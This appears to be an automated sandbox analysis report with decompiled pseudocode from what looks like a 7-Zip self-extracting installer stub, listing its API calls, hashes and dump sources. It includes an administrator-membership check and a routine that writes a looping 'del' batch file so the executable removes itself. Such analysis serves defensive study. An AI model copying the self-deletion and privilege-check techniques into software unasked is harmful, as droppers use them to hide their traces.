                                          0x00408db3
                                          0x00408db9
                                          0x00408dbb
                                          0x00408dc8
                                          0x00408dc8
                                          0x00408dcd
                                          0x00408dd3
                                          0x00408de2
                                          0x00408de2
                                          0x00408de7
                                          0x00408dea
                                          0x00408e12
                                          0x00408e14
                                          0x00408e15
                                          0x00408345
                                          0x0040834e
                                          0x0040834f
                                          0x00408358
                                          0x00408361
                                          0x00408365
                                          0x0040837b
                                          0x0040838e
                                          0x0040838e
                                          0x004083a6
                                          0x004083ab
                                          0x004083ae
                                          0x004083b6
                                          0x00408dec
                                          0x00408dee
                                          0x00408df8
                                          0x00408dff
                                          0x00408dff
                                          0x00408e10
                                          0x00408e10

                                          APIs
                                          • GetCurrentThreadId.KERNEL32 ref: 00408DBB
                                          • SetWindowsHookExW.USER32(00000007,Function_00008CE2,00000000,00000000), ref: 00408DC6
                                          • GetCurrentThreadId.KERNEL32 ref: 00408DD5
                                          • SetWindowsHookExW.USER32(00000002,Function_00008D6E,00000000,00000000), ref: 00408DE0
                                          • EndDialog.USER32(?,00000000), ref: 00408E06
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: CurrentHookThreadWindows$Dialog
                                          • String ID:
                                          • API String ID: 1967849563-0
                                          • Opcode ID: 555e22be0927065058935bc2a06d0ed766fc6dfd7081a73748e4d77ef7fe2c80
                                          • Instruction ID: 0a2569f36482c6f38668c5daa31400cb5052fc60ef6564e58e43505ef2e78625
                                          • Opcode Fuzzy Hash: 555e22be0927065058935bc2a06d0ed766fc6dfd7081a73748e4d77ef7fe2c80
                                          • Instruction Fuzzy Hash: AB0186B1700218AFD3207B66EE44A76F7ECEB54355B51413FE245D11E0CBB698419B68
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00403F0A, Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E00403F0A() {
				void* _v8;
				char _v12;
				short _v16;
				struct _SID_IDENTIFIER_AUTHORITY _v20;
				int _t13;

				_v12 = 0;
				_v8 = 0;
				_v20.Value = 0;
				_v16 = 0x500;
				_t13 = AllocateAndInitializeSid( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v8);
				if(_t13 != 0) {
					__imp__CheckTokenMembership(0, _v8,  &_v12);
					FreeSid(_v8);
					return _v12;
				}
				return _t13;
			}








                                          0x00403f2a
                                          0x00403f2d
                                          0x00403f30
                                          0x00403f33
                                          0x00403f39
                                          0x00403f41
                                          0x00403f4b
                                          0x00403f54
                                          0x00000000
                                          0x00403f5a
                                          0x00403f5f

                                          APIs
                                          • AllocateAndInitializeSid.ADVAPI32(00406727,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,004227B8,00406727), ref: 00403F39
                                          • CheckTokenMembership.ADVAPI32(00000000,00000000,?), ref: 00403F4B
                                          • FreeSid.ADVAPI32(00000000), ref: 00403F54
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: AllocateCheckFreeInitializeMembershipToken
                                          • String ID:
                                          • API String ID: 3429775523-0
                                          • Opcode ID: 9af3efcf16d1d355448efefa57cf4683c3fc5815afa2ad2ad1a3db22a18f9f3b
                                          • Instruction ID: 3f24cb71bbfe7ca770cd4889a07e58a9e46d275895eb10eec906826fdd799b13
                                          • Opcode Fuzzy Hash: 9af3efcf16d1d355448efefa57cf4683c3fc5815afa2ad2ad1a3db22a18f9f3b
                                          • Instruction Fuzzy Hash: 82F0DAB5D00208FBDB00DFD5DD89ADEBBBCFB08345F504465A605E2191D3709B049B19
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00401D63, Relevance: 56.2, APIs: 30, Strings: 2, Instructions: 196threadprocesssynchronizationCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 74%
                                          			E00401D63(void* __ecx, void* __edx, void* __eflags) {
				void* _t58;
				void* _t83;
				void* _t88;
				int _t100;
				void* _t131;
				void* _t138;
				void* _t139;
				long _t140;
				intOrPtr* _t142;
				void* _t144;
				void* _t148;

				_t148 = __eflags;
				_t142 = _t144 - 0x74;
				_t131 = __ecx;
				_t138 = __edx;
				E004147DF(E004147DF(_t58, _t142 + 0x30), _t142 + 0x3c);
				E00403022(GetCommandLineW(), _t142 + 0x30);
				E004146E1(_t142 + 0xc, _t148, E00414787(_t142, E00414787(_t142 - 0xc, E004147B1(_t142 - 0x18, "\"", _t142 + 0x30), L"\" -"), L"sfxwaitall"), 0x3a);
				E004146E1(_t142 + 0x24, _t148, _t142 + 0xc,  *(_t142 + 0x7c) + 0x30);
				E004146E1(_t142 + 0x18, _t148, _t142 + 0x24, 0x20);
				E004146E1(_t142 + 0x5c, _t148, _t142 + 0x18, 0x22);
				E00414864(_t142 + 0x3c,  *((intOrPtr*)(E00414787(_t142 - 0x24, E00414787(_t142 - 0x30, E00414787(_t142 - 0x3c, _t142 + 0x5c, _t131), L"\" "), _t138))));
				_push( *((intOrPtr*)(_t142 - 0x24)));
				L0041C160();
				_push( *((intOrPtr*)(_t142 - 0x30)));
				L0041C160();
				_push( *((intOrPtr*)(_t142 - 0x3c)));
				L0041C160();
				_push( *((intOrPtr*)(_t142 + 0x5c)));
				L0041C160();
				_push( *((intOrPtr*)(_t142 + 0x18)));
				L0041C160();
				_push( *((intOrPtr*)(_t142 + 0x24)));
				L0041C160();
				_push( *((intOrPtr*)(_t142 + 0xc)));
				L0041C160();
				_push( *_t142);
				L0041C160();
				_push( *((intOrPtr*)(_t142 - 0xc)));
				L0041C160();
				_push( *((intOrPtr*)(_t142 - 0x18)));
				L0041C160();
				 *(_t142 - 0x80) = 0x44;
				GetStartupInfoW(_t142 - 0x80);
				_t83 = CreateProcessW(0,  *(_t142 + 0x3c), 0, 0, 1, 0x1000004, 0,  *0x42289c, _t142 - 0x80, _t142 + 0x48);
				if(_t83 != 0) {
					_t139 = 0;
					__imp__CreateJobObjectW(0, 0);
					 *(_t142 + 0x7c) = _t83;
					__eflags = _t83;
					if(_t83 == 0) {
						L9:
						ResumeThread( *(_t142 + 0x4c));
						WaitForSingleObject( *(_t142 + 0x48), 0xffffffff);
						L10:
						CloseHandle( *(_t142 + 0x4c));
						_t88 = GetExitCodeProcess( *(_t142 + 0x48), _t142 + 0x6c);
						__eflags = _t88;
						if(_t88 == 0) {
							 *(_t142 + 0x6c) = GetLastError();
						}
						CloseHandle( *(_t142 + 0x48));
						__eflags = _t139;
						if(_t139 != 0) {
							CloseHandle(_t139);
						}
						__eflags =  *(_t142 + 0x7c);
						if( *(_t142 + 0x7c) != 0) {
							CloseHandle( *(_t142 + 0x7c));
						}
						_t140 =  *(_t142 + 0x6c);
						L2:
						_push( *(_t142 + 0x3c));
						L0041C160();
						_push( *((intOrPtr*)(_t142 + 0x30)));
						L0041C160();
						return _t140;
					}
					__imp__AssignProcessToJobObject(_t83,  *(_t142 + 0x48));
					__eflags = _t83;
					if(_t83 == 0) {
						goto L9;
					}
					_t139 = CreateIoCompletionPort(0xffffffff, 0, 1, 0);
					__eflags = _t139;
					if(_t139 == 0) {
						goto L9;
					}
					 *((intOrPtr*)(_t142 + 0x60)) = 1;
					 *(_t142 + 0x64) = _t139;
					__imp__SetInformationJobObject( *(_t142 + 0x7c), 7, _t142 + 0x60, 8);
					ResumeThread( *(_t142 + 0x4c));
					while(1) {
						_t100 = GetQueuedCompletionStatus(_t139, _t142 + 0x70, _t142 + 0x68, _t142 + 0x58, 0xffffffff);
						__eflags = _t100;
						if(_t100 == 0) {
							goto L9;
						}
						__eflags =  *(_t142 + 0x70) - 4;
						if( *(_t142 + 0x70) == 4) {
							goto L10;
						}
					}
					goto L9;
				}
				_t140 = GetLastError();
				goto L2;
			}














                                          0x00401d63
                                          0x00401d64
                                          0x00401d71
                                          0x00401d76
                                          0x00401d80
                                          0x00401d90
                                          0x00401dca
                                          0x00401ddd
                                          0x00401deb
                                          0x00401df9
                                          0x00401e29
                                          0x00401e2e
                                          0x00401e31
                                          0x00401e36
                                          0x00401e39
                                          0x00401e3e
                                          0x00401e41
                                          0x00401e46
                                          0x00401e49
                                          0x00401e4e
                                          0x00401e51
                                          0x00401e56
                                          0x00401e59
                                          0x00401e5e
                                          0x00401e61
                                          0x00401e66
                                          0x00401e69
                                          0x00401e6e
                                          0x00401e71
                                          0x00401e76
                                          0x00401e79
                                          0x00401e85
                                          0x00401e8c
                                          0x00401eb2
                                          0x00401eba
                                          0x00401ee4
                                          0x00401ee6
                                          0x00401eec
                                          0x00401eef
                                          0x00401ef1
                                          0x00401f55
                                          0x00401f58
                                          0x00401f63
                                          0x00401f69
                                          0x00401f72
                                          0x00401f7b
                                          0x00401f81
                                          0x00401f83
                                          0x00401f8b
                                          0x00401f8b
                                          0x00401f91
                                          0x00401f93
                                          0x00401f95
                                          0x00401f98
                                          0x00401f98
                                          0x00401f9a
                                          0x00401f9d
                                          0x00401fa2
                                          0x00401fa2
                                          0x00401fa4
                                          0x00401ec4
                                          0x00401ec4
                                          0x00401ec7
                                          0x00401ecc
                                          0x00401ecf
                                          0x00401edf
                                          0x00401edf
                                          0x00401ef7
                                          0x00401efd
                                          0x00401eff
                                          0x00000000
                                          0x00000000
                                          0x00401f0c
                                          0x00401f0e
                                          0x00401f10
                                          0x00000000
                                          0x00000000
                                          0x00401f1d
                                          0x00401f20
                                          0x00401f23
                                          0x00401f2c
                                          0x00401f40
                                          0x00401f4f
                                          0x00401f51
                                          0x00401f53
                                          0x00000000
                                          0x00000000
                                          0x00401f3a
                                          0x00401f3e
                                          0x00000000
                                          0x00000000
                                          0x00401f3e
                                          0x00000000
                                          0x00401f40
                                          0x00401ec2
                                          0x00000000

                                          APIs
                                            • Part of subcall function 004147DF: ??2@YAPAXI@Z.MSVCRT ref: 004147E7
                                          • GetCommandLineW.KERNEL32(0041D9F0,00000000,00000000), ref: 00401D85
                                            • Part of subcall function 004146E1: memcpy.MSVCRT ref: 00414706
                                            • Part of subcall function 00414864: ??2@YAPAXI@Z.MSVCRT ref: 00414896
                                            • Part of subcall function 00414864: ??3@YAXPAX@Z.MSVCRT ref: 0041489F
                                            • Part of subcall function 00414864: memcpy.MSVCRT ref: 004148B7
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00401E31
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00401E39
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00401E41
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00401E49
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00401E51
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00401E59
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00401E61
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00401E69
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00401E71
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00401E79
                                          • GetStartupInfoW.KERNEL32(?,00000022,?,00000020,?,?,00000000,0000003A,?," -,sfxwaitall), ref: 00401E8C
                                          • CreateProcessW.KERNEL32 ref: 00401EB2
                                          • GetLastError.KERNEL32 ref: 00401EBC
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00401EC7
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00401ECF
                                          • CreateJobObjectW.KERNEL32 ref: 00401EE6
                                          • AssignProcessToJobObject.KERNEL32 ref: 00401EF7
                                          • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000001,00000000), ref: 00401F06
                                          • SetInformationJobObject.KERNEL32(?,00000007,?,00000008), ref: 00401F23
                                          • ResumeThread.KERNEL32(?), ref: 00401F2C
                                          • GetQueuedCompletionStatus.KERNEL32(00000000,?,?,?,000000FF), ref: 00401F4F
                                          • ResumeThread.KERNEL32(?), ref: 00401F58
                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00401F63
                                          • CloseHandle.KERNEL32(?), ref: 00401F72
                                          • GetExitCodeProcess.KERNEL32 ref: 00401F7B
                                          • GetLastError.KERNEL32 ref: 00401F85
                                          • CloseHandle.KERNEL32(?), ref: 00401F91
                                          • CloseHandle.KERNEL32(00000000), ref: 00401F98
                                          • CloseHandle.KERNEL32(?), ref: 00401FA2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ??3@$CloseHandleObject$CreateProcess$??2@CompletionErrorLastResumeThreadmemcpy$AssignCodeCommandExitInfoInformationLinePortQueuedSingleStartupStatusWait
                                          • String ID: " -$sfxwaitall
                                          • API String ID: 1989023053-3991362806
                                          • Opcode ID: 03f2516181052f227ff0f804cd5943db3b31b4a938699f5d65c9949540d152f7
                                          • Instruction ID: b35bb808f7c11860acb9b83f91dbbd997240e1bc6af43985ebd9c44236cdfafe
                                          • Opcode Fuzzy Hash: 03f2516181052f227ff0f804cd5943db3b31b4a938699f5d65c9949540d152f7
                                          • Instruction Fuzzy Hash: 03619972540108BFCF15AF61DC85DEE3BB9AF04308B10813AF926A21B1DB389D51CB5C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00405AA6, Relevance: 38.6, APIs: 14, Strings: 8, Instructions: 145fileCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 81%
                                          			E00405AA6(void* __esi, WCHAR* _a4) {
				long _v8;
				short _v10;
				short _v12;
				short _v14;
				short _v16;
				long _v24;
				char _v28;
				WCHAR* _v40;
				char _v52;
				void* _t42;
				short _t44;
				short _t45;
				int _t66;
				void* _t72;
				signed int _t74;
				void* _t99;

				_t99 = __esi;
				_t42 = _a4;
				if( *((short*)(_t42 + 2)) != 0x3a) {
					L11:
					_push(_t42);
					goto L12;
				} else {
					_t3 = _t42 + 4; // 0x1519c
					_t74 =  *_t3 & 0x0000ffff;
					if(_t74 == 0x5c || _t74 == 0x2f) {
						_v16 =  *_t42;
						_t44 = 0x3a;
						_v14 = _t44;
						_t45 = 0x5c;
						_v12 = _t45;
						_v10 = 0;
						_t42 = GetDriveTypeW( &_v16);
						if(_t42 == 3) {
							E004042B5(L"7ZSfx%03x.cmd", __eflags);
							_t42 = CreateFileW(_v40, 0x40000000, 0, 0, 2, 0x80, 0);
							_t72 = _t42;
							__eflags = _t72 - 0xffffffff;
							if(_t72 == 0xffffffff) {
								L9:
								_push(_v40);
								L0041C160();
								_push(_a4);
								L0041C160();
								goto L13;
							} else {
								_push(_t99);
								E004147DF(_t42,  &_v28);
								E00414864( &_v28, L":Repeat\r\n");
								E00414922( &_v28, L"del \"");
								E00414962( &_v28, __eflags,  &_a4);
								E00414922( &_v28, L"\"\r\n");
								E00414922( &_v28, L"if exist \"");
								E00414962( &_v28, __eflags,  &_a4);
								E00414922( &_v28, L"\" goto Repeat\r\n");
								E00414922( &_v28, L"del \"");
								E00414962( &_v28, __eflags,  &_v40);
								E00414922( &_v28, L"\"\r\n");
								_t66 = WriteFile(_t72,  *(E0040438B( &_v52,  &_v28, __eflags, 1)), _v24,  &_v8, 0);
								_push(_v52);
								L0041C160();
								CloseHandle(_t72);
								__eflags = _t66;
								if(_t66 == 0) {
									L10:
									_t42 = E00403442(_v40);
									_push(_v28);
									L0041C160();
									_push(_v40);
									L0041C160();
									_push(_a4);
									L0041C160();
								} else {
									__eflags = _v8 - _v24;
									if(_v8 != _v24) {
										goto L10;
									} else {
										SetFileAttributesW(_a4, 0);
										_t42 = ShellExecuteW(0, L"open", _v40, 0, 0, 0);
										_push(_v28);
										L0041C160();
										goto L9;
									}
								}
							}
						} else {
							_push(_a4);
							L12:
							L0041C160();
							L13:
						}
					} else {
						goto L11;
					}
				}
				return _t42;
			}



















                                          0x00405aa6
                                          0x00405aa9
                                          0x00405ab6
                                          0x00405c52
                                          0x00405c52
                                          0x00000000
                                          0x00405abc
                                          0x00405abc
                                          0x00405abc
                                          0x00405ac3
                                          0x00405ad3
                                          0x00405ad7
                                          0x00405ad8
                                          0x00405ade
                                          0x00405adf
                                          0x00405ae5
                                          0x00405aed
                                          0x00405af6
                                          0x00405b08
                                          0x00405b21
                                          0x00405b27
                                          0x00405b29
                                          0x00405b2c
                                          0x00405c1a
                                          0x00405c1a
                                          0x00405c1d
                                          0x00405c22
                                          0x00405c25
                                          0x00000000
                                          0x00405b32
                                          0x00405b32
                                          0x00405b36
                                          0x00405b43
                                          0x00405b51
                                          0x00405b5d
                                          0x00405b6b
                                          0x00405b78
                                          0x00405b84
                                          0x00405b91
                                          0x00405b9a
                                          0x00405ba6
                                          0x00405baf
                                          0x00405bd0
                                          0x00405bd6
                                          0x00405bdb
                                          0x00405be2
                                          0x00405be8
                                          0x00405beb
                                          0x00405c2d
                                          0x00405c30
                                          0x00405c35
                                          0x00405c38
                                          0x00405c3d
                                          0x00405c40
                                          0x00405c45
                                          0x00405c48
                                          0x00405bed
                                          0x00405bf0
                                          0x00405bf3
                                          0x00000000
                                          0x00405bf5
                                          0x00405bf9
                                          0x00405c0b
                                          0x00405c11
                                          0x00405c14
                                          0x00000000
                                          0x00405c19
                                          0x00405bf3
                                          0x00405beb
                                          0x00405af8
                                          0x00405af8
                                          0x00405c53
                                          0x00405c53
                                          0x00405c58
                                          0x00405c58
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00405ac3
                                          0x00405c5c

                                          APIs
                                          • GetDriveTypeW.KERNEL32(?,PreExtract,00000000,?,?,?,?,?,?,?,?,?,?,00406FBC,00422844,PreExtract), ref: 00405AED
                                            • Part of subcall function 004042B5: GetTempPathW.KERNEL32(00000001,00000000,00000002,PreExtract,0041DA3C,?,00000000,?,00405B0D), ref: 004042D7
                                            • Part of subcall function 004042B5: GetTempPathW.KERNEL32(00000001,00000000,00000001,?,00000000,?,00405B0D), ref: 004042F6
                                            • Part of subcall function 004042B5: wsprintfW.USER32 ref: 00404318
                                            • Part of subcall function 004042B5: GetFileAttributesW.KERNELBASE(?,?,?,00405B0D,?,?,?,?,?,?,?,?,?,?,00406FBC,00422844), ref: 0040432A
                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00405B21
                                          • WriteFile.KERNEL32(00000000,?,?,00422844,00000000,00000001,",?,del "," goto Repeat,00406FBC,if exist ",",00406FBC,del ",:Repeat), ref: 00405BD0
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00405BDB
                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00406FBC,00422844,PreExtract,0042289C,00000000), ref: 00405BE2
                                          • SetFileAttributesW.KERNEL32(00406FBC,00000000,?,?,?,?,?,?,?,?,?,00406FBC,00422844,PreExtract,0042289C,00000000), ref: 00405BF9
                                          • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00405C0B
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00405C14
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00405C1D
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00405C25
                                            • Part of subcall function 004147DF: ??2@YAPAXI@Z.MSVCRT ref: 004147E7
                                            • Part of subcall function 00414864: ??2@YAPAXI@Z.MSVCRT ref: 00414896
                                            • Part of subcall function 00414864: ??3@YAXPAX@Z.MSVCRT ref: 0041489F
                                            • Part of subcall function 00414864: memcpy.MSVCRT ref: 004148B7
                                            • Part of subcall function 00414922: memcpy.MSVCRT ref: 0041494F
                                            • Part of subcall function 00414962: memcpy.MSVCRT ref: 00414985
                                            • Part of subcall function 0040438B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,?,00000000,00422090,009D2588,00401669,0000FDE9,009D2588), ref: 004043BE
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00405C38
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00405C40
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00405C48
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00405C53
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ??3@$File$memcpy$??2@AttributesPathTemp$ByteCharCloseCreateDriveExecuteHandleMultiShellTypeWideWritewsprintf
                                          • String ID: "$" goto Repeat$7ZSfx%03x.cmd$:Repeat$PreExtract$del "$if exist "$open
                                          • API String ID: 1368565367-2062918900
                                          • Opcode ID: bd07ac5b5cf9db83162ad976ab6679d1d101fe38afbba23574025e75f50d8382
                                          • Instruction ID: 3d7160049abe49b234d8e21697658e41e6c45daee110ef6cf63ccbde248cf787
                                          • Opcode Fuzzy Hash: bd07ac5b5cf9db83162ad976ab6679d1d101fe38afbba23574025e75f50d8382
                                          • Instruction Fuzzy Hash: B8416075940108BADB05EBA1DC86DEF7B78EF85704F10406AF602B60E1DB786E85CB5C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00408E57, Relevance: 36.3, APIs: 24, Instructions: 265windowCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 68%
                                          			E00408E57(void* __edx) {
				struct HWND__* _v4;
				struct HWND__* _v8;
				void* __ecx;
				signed int _t45;
				signed int _t51;
				long _t53;
				signed int _t67;
				void* _t71;
				void* _t75;
				long _t91;
				int _t95;
				int _t96;
				struct HWND__* _t102;
				struct HWND__* _t103;
				struct HWND__* _t104;
				long _t107;
				intOrPtr* _t108;
				void* _t111;
				void* _t113;
				void* _t126;
				void* _t129;
				void* _t133;
				void* _t135;
				intOrPtr* _t140;
				void* _t143;
				long _t147;

				_t135 = __edx;
				_t140 = _t108;
				 *0x422784 = 0;
				if(( *0x42245c & 0x00000200) == 0) {
					_v8 = LoadIconW(GetModuleHandleW(0), 0x65);
					_t95 = GetSystemMetrics(0x32);
					_t96 = GetSystemMetrics(0x31);
					_t107 = LoadImageW(GetModuleHandleW(0), 0x65, 1, _t96, _t95, 0);
					if(_t107 == 0) {
						_t107 = _v8;
					}
					SendMessageW( *(_t140 + 4), 0x80, 1, _v8);
					SendMessageW( *(_t140 + 4), 0x80, 0, _t107);
				}
				if(( *0x42245c & 0x00004000) != 0) {
					_v8 = GetDlgItem( *(_t140 + 4), 0x4b2);
					_v4 = GetDlgItem( *(_t140 + 4), 0x4b2);
					SetWindowLongW(_v4, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) | 0x00000080);
					_v4 = GetDlgItem( *(_t140 + 4), 0x4b5);
					_v8 = GetDlgItem( *(_t140 + 4), 0x4b5);
					_t91 = GetWindowLongW(_v4, 0xfffffff0) | 0x00000080;
					_t147 = _t91;
					SetWindowLongW(_v8, 0xfffffff0, _t91);
				}
				E0040790B(GetDlgItem( *(_t140 + 4), 0x4b2),  *((intOrPtr*)(_t140 + 0x10)));
				E00407F52(_t140, _t147,  *((intOrPtr*)(_t140 + 0xc)));
				_t45 =  *(_t140 + 8) & 0x00000003;
				if(_t45 == 0) {
					_t111 = 0x1b;
					E00408530(_t140, 0x4b3, E00403CE0(_t111));
					_push(0x1c);
					goto L14;
				} else {
					_t71 = _t45 - 1;
					if(_t71 == 0) {
						_t126 = 0x19;
						E00408530(_t140, 0x4b3, E00403CE0(_t126));
						E004079B7(_t140, 0x4b4, 0);
						L15:
						if( *((intOrPtr*)(_t140 + 0x38)) == 0) {
							_t51 =  *(_t140 + 8) & 0x0000001c;
							__eflags = _t51 - 4;
							if(_t51 == 4) {
								_push(0x65);
								_push(GetModuleHandleW(0));
								L39:
								_t53 = LoadIconW();
								__eflags = _t53;
								if(_t53 == 0) {
									L41:
									 *((intOrPtr*)(_t140 + 0x30)) = 0;
									E004079B7(_t140, 0x4b1, 0);
									L42:
									__eflags =  *0x42245c & 0x00000008;
									if(( *0x42245c & 0x00000008) == 0) {
										E00407E2D(_t140);
									}
									 *((intOrPtr*)( *_t140 + 0x28))();
									 *((intOrPtr*)( *_t140 + 0x24))();
									L45:
									E004078AD(_t140, _t135);
									return 0;
								}
								 *((intOrPtr*)(_t140 + 0x30)) = 1;
								SendMessageW(GetDlgItem( *(_t140 + 4), 0x4b1), 0x172, 1, _t53);
								goto L42;
							}
							__eflags = _t51 - 8;
							if(_t51 == 8) {
								_push(0x7f02);
								L34:
								_push(0);
								goto L39;
							}
							__eflags = _t51 - 0xc;
							if(_t51 == 0xc) {
								_push(0x7f01);
								goto L34;
							}
							__eflags = _t51 - 0x10;
							if(_t51 == 0x10) {
								_push(0x7f04);
								goto L34;
							}
							__eflags = _t51 - 0x14;
							if(_t51 != 0x14) {
								goto L41;
							}
							_push(0x7f03);
							goto L34;
						}
						_t143 = 5;
						_push(_t143);
						_push( *(_t140 + 4));
						while(1) {
							_t102 = GetWindow();
							if(_t102 == 0) {
								goto L19;
							}
							E00404B33(_t102);
							_push(2);
							_push(_t102);
						}
						while(1) {
							L19:
							_push(_t143);
							_push( *(_t140 + 4));
							while(1) {
								_t103 = GetWindow();
								if(_t103 == 0) {
									break;
								}
								_t67 = E00404BA4(_t103);
								__eflags = _t67;
								if(_t67 != 0) {
									goto L19;
								}
								_push(2);
								_push(_t103);
							}
							_push(_t143);
							_push( *(_t140 + 4));
							while(1) {
								_t104 = GetWindow();
								if(_t104 == 0) {
									break;
								}
								E00403B31(_t104);
								_push(2);
								_push(_t104);
							}
							if(( *0x42245c & 0x00000008) == 0) {
								E00407E2D(_t140);
							}
							goto L45;
						}
					}
					_t75 = _t71 - 1;
					if(_t75 == 0) {
						_t129 = 0x1a;
						E00408530(_t140, 0x4b4, E00403CE0(_t129));
						E004079B7(_t140, 0x4b3, 0);
						E00407790(_t140, 0x4b4);
						goto L15;
					}
					if(_t75 != 1) {
						goto L15;
					}
					_t133 = 0x19;
					E00408530(_t140, 0x4b3, E00403CE0(_t133));
					_push(0x1a);
					L14:
					_pop(_t113);
					E00408530(_t140, 0x4b4, E00403CE0(_t113));
					goto L15;
				}
			}





























                                          0x00408e57
                                          0x00408e67
                                          0x00408e69
                                          0x00408e75
                                          0x00408e94
                                          0x00408e98
                                          0x00408e9d
                                          0x00408eaf
                                          0x00408eb3
                                          0x00408eb5
                                          0x00408eb5
                                          0x00408ec9
                                          0x00408ed2
                                          0x00408ed2
                                          0x00408ee9
                                          0x00408ef5
                                          0x00408f01
                                          0x00408f14
                                          0x00408f2c
                                          0x00408f38
                                          0x00408f42
                                          0x00408f42
                                          0x00408f4b
                                          0x00408f4b
                                          0x00408f5d
                                          0x00408f67
                                          0x00408f74
                                          0x00408f76
                                          0x00408ff1
                                          0x00408fff
                                          0x00409004
                                          0x00000000
                                          0x00408f78
                                          0x00408f78
                                          0x00408f79
                                          0x00408fcd
                                          0x00408fdb
                                          0x00408fe8
                                          0x00409019
                                          0x0040901c
                                          0x0040908f
                                          0x00409092
                                          0x00409095
                                          0x004090c8
                                          0x004090d1
                                          0x004090d2
                                          0x004090d2
                                          0x004090d8
                                          0x004090da
                                          0x004090fc
                                          0x00409104
                                          0x00409107
                                          0x0040910c
                                          0x0040910c
                                          0x00409113
                                          0x00409117
                                          0x00409117
                                          0x00409120
                                          0x00409127
                                          0x0040912a
                                          0x0040912c
                                          0x00409139
                                          0x00409139
                                          0x004090ee
                                          0x004090f4
                                          0x00000000
                                          0x004090f4
                                          0x00409097
                                          0x0040909a
                                          0x004090c1
                                          0x004090b0
                                          0x004090b0
                                          0x00000000
                                          0x004090b0
                                          0x0040909c
                                          0x0040909f
                                          0x004090ba
                                          0x00000000
                                          0x004090ba
                                          0x004090a1
                                          0x004090a4
                                          0x004090b3
                                          0x00000000
                                          0x004090b3
                                          0x004090a6
                                          0x004090a9
                                          0x00000000
                                          0x00000000
                                          0x004090ab
                                          0x00000000
                                          0x004090ab
                                          0x00409026
                                          0x00409027
                                          0x00409028
                                          0x00409037
                                          0x00409039
                                          0x0040903d
                                          0x00000000
                                          0x00000000
                                          0x0040902f
                                          0x00409034
                                          0x00409036
                                          0x00409036
                                          0x0040903f
                                          0x0040903f
                                          0x0040903f
                                          0x00409040
                                          0x00409053
                                          0x00409055
                                          0x00409059
                                          0x00000000
                                          0x00000000
                                          0x00409047
                                          0x0040904c
                                          0x0040904e
                                          0x00000000
                                          0x00000000
